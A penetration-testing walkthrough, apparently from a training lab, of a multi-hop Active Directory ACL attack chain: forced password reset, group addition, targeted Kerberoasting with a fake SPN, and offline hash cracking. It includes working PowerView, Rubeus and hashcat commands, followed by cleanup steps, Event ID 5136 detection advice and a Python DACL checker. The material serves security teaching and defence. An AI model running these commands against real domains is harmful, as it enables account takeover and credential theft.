
ACL Abuse Tactics

End-to-end walkthrough of executing a multi-hop ACL attack chain, from initial foothold through targeted Kerberoasting, including cleanup and detection/remediation guidance.

Attack Chain Overview

wley (compromised via Responder + Hashcat)
  → ForceChangePassword → damundsen
    → GenericWrite → Help Desk Level 1 (add damundsen)
      → MemberOf → Information Technology (nested)
        → GenericAll → adunn (targeted Kerberoast)
          → DS-Replication-Get-Changes → DCSync

Step 1: Force Change Password (wley → damundsen)

Authenticate as the controlled user

$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)

Set the new password and change it

Import-Module .\PowerView.ps1
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

From Linux, the pth-net tool (part of pth-toolkit) can accomplish the same.

Step 2: Add to Group (damundsen → Help Desk Level 1)

Authenticate as damundsen

$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)

Verify current membership, add, and confirm

Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members

Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

Through nested group membership (Help Desk Level 1 → Information Technology), damundsen now inherits GenericAll over the adunn user.

Step 3: Targeted Kerberoasting (GenericAll β†’ adunn)

When the target account cannot be disrupted (e.g., an admin account in active use), prefer targeted Kerberoasting over a password reset: assign a fake SPN, request the TGS, and crack it offline.

Create a fake SPN

Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

From Linux, the targetedKerberoast tool creates a temporary SPN, retrieves the hash, and deletes the SPN in one command.

Kerberoast the account

.\Rubeus.exe kerberoast /user:adunn /nowrap

Crack the hash offline

hashcat -m 13100 adunn_tgs /usr/share/wordlists/rockyou.txt

With the cleartext password, authenticate as adunn and proceed to DCSync.

Cleanup (Order Matters)

Cleanup must happen in reverse order: remove the SPN before removing the group membership, since the group membership is what grants the rights needed to modify the SPN.

1. Remove the fake SPN

Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose

2. Remove damundsen from the group

Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose

3. Verify removal

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName | ? {$_.MemberName -eq 'damundsen'}

4. Coordinate password restoration

Work with the client to reset the damundsen password to its original value or a new known value.

Document every modification in the assessment report and confirm all changes were reverted.

Detection & Remediation

Auditing

| Control | Details |
|---|---|
| Regular ACL audits | Use BloodHound to identify and remove dangerous ACLs. Train internal staff to run these tools. |
| Monitor group membership | Alert on changes to high-impact groups (Domain Admins, Enterprise Admins, sensitive security groups). |
| Advanced Security Audit Policy | Enable auditing to detect ACL modifications via Event ID 5136. |

Event ID 5136: Directory Service Object Modified

Logged when a directory object is modified; for an ACL change the modified attribute is the object's security descriptor, and the event carries its new value as an SDDL (Security Descriptor Definition Language) string, which is not human-readable by default.

Convert SDDL to readable format:

ConvertFrom-SddlString "<SDDL_STRING>" | select -ExpandProperty DiscretionaryAcl

Look for unexpected principals with GenericWrite, GenericAll, or WriteDACL on high-value objects; these indicate a potential ACL attack being set up.
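The check described above, as an added example that is not code from the original post: a small Python parser for the DACL portion of an SDDL string (as carried in a 5136 event or returned by ConvertFrom-SddlString) that flags allow ACEs granting GenericAll, GenericWrite, WriteDACL, WriteOwner or WriteProperty to principals outside an expected set. The expected-principal set, the sample SDDL, its SIDs and the attribute GUID are constructed assumptions, not values from the page.

```python
import re

# Two-letter SDDL rights codes that let a principal take over a directory object.
DANGEROUS_CODES = {"GA": "GenericAll", "GW": "GenericWrite", "WD": "WriteDACL",
                   "WO": "WriteOwner", "WP": "WriteProperty"}
# The same rights as access-mask bits, for ACEs written as a hex mask instead of codes.
DANGEROUS_BITS = {0x10000000: "GenericAll", 0x40000000: "GenericWrite",
                  0x00040000: "WriteDACL", 0x00080000: "WriteOwner", 0x20: "WriteProperty"}
# Principals allowed to hold these rights. Assumption: tune to your domain; 5136 events
# may show full SIDs rather than the well-known SDDL aliases used here.
EXPECTED_PRINCIPALS = {"SY", "BA", "DA", "EA"}

def parse_rights(rights):
    """Return the dangerous rights named by an SDDL rights field (letter codes or hex mask)."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return sorted(name for bit, name in DANGEROUS_BITS.items() if mask & bit)
    codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
    return sorted(DANGEROUS_CODES[c] for c in codes if c in DANGEROUS_CODES)

def find_dangerous_aces(sddl):
    """Return (trustee, rights) for each allow ACE in the DACL that grants takeover rights
    to a principal outside EXPECTED_PRINCIPALS. Deny ACEs and the SACL are ignored."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)  # "D:" + flags + (ace)(ace)...
    if not dacl:
        return []
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1)):
        fields = ace.split(";")
        if len(fields) < 6:
            continue  # malformed ACE
        ace_type, _flags, rights, obj_guid, _inherit_guid, trustee = fields[:6]
        if ace_type not in ("A", "OA"):  # only allow / object-allow ACEs grant rights
            continue
        dangerous = parse_rights(rights)
        if obj_guid and dangerous == ["WriteProperty"]:
            # a write scoped to one attribute still matters (e.g. servicePrincipalName); report the GUID
            dangerous = [f"WriteProperty on attribute {obj_guid}"]
        if dangerous and trustee not in EXPECTED_PRINCIPALS:
            findings.append((trustee, dangerous))
    return findings

# Constructed sample DACL as it might appear in a 5136 event for a user object: Domain Admins
# and SYSTEM legitimately hold full control; the last two ACEs favour an ordinary user SID.
SAMPLE_SDDL = ("O:DAG:DAD:AI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWOGA;;;DA)(A;;GA;;;SY)(A;;RPLCLORC;;;AU)"
               "(OA;;WP;11111111-2222-3333-4444-555555555555;;S-1-5-21-1111-2222-3333-1105)"
               "(A;;GA;;;S-1-5-21-1111-2222-3333-1105)")
if __name__ == "__main__":
    for trustee, rights in find_dangerous_aces(SAMPLE_SDDL):
        print(f"ALERT: {trustee} granted {', '.join(rights)}")
```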

Remediation Recommendations

  • Audit and remove dangerous ACLs on a regular cadence
  • Monitor high-impact group membership for unauthorized changes
  • Enable Advanced Security Audit Policy for directory service changes
  • Use tools like BloodHound proactively (not just offensively) to map and reduce ACL attack surface
  • Be aware that software installs (especially Exchange) can introduce excessive ACLs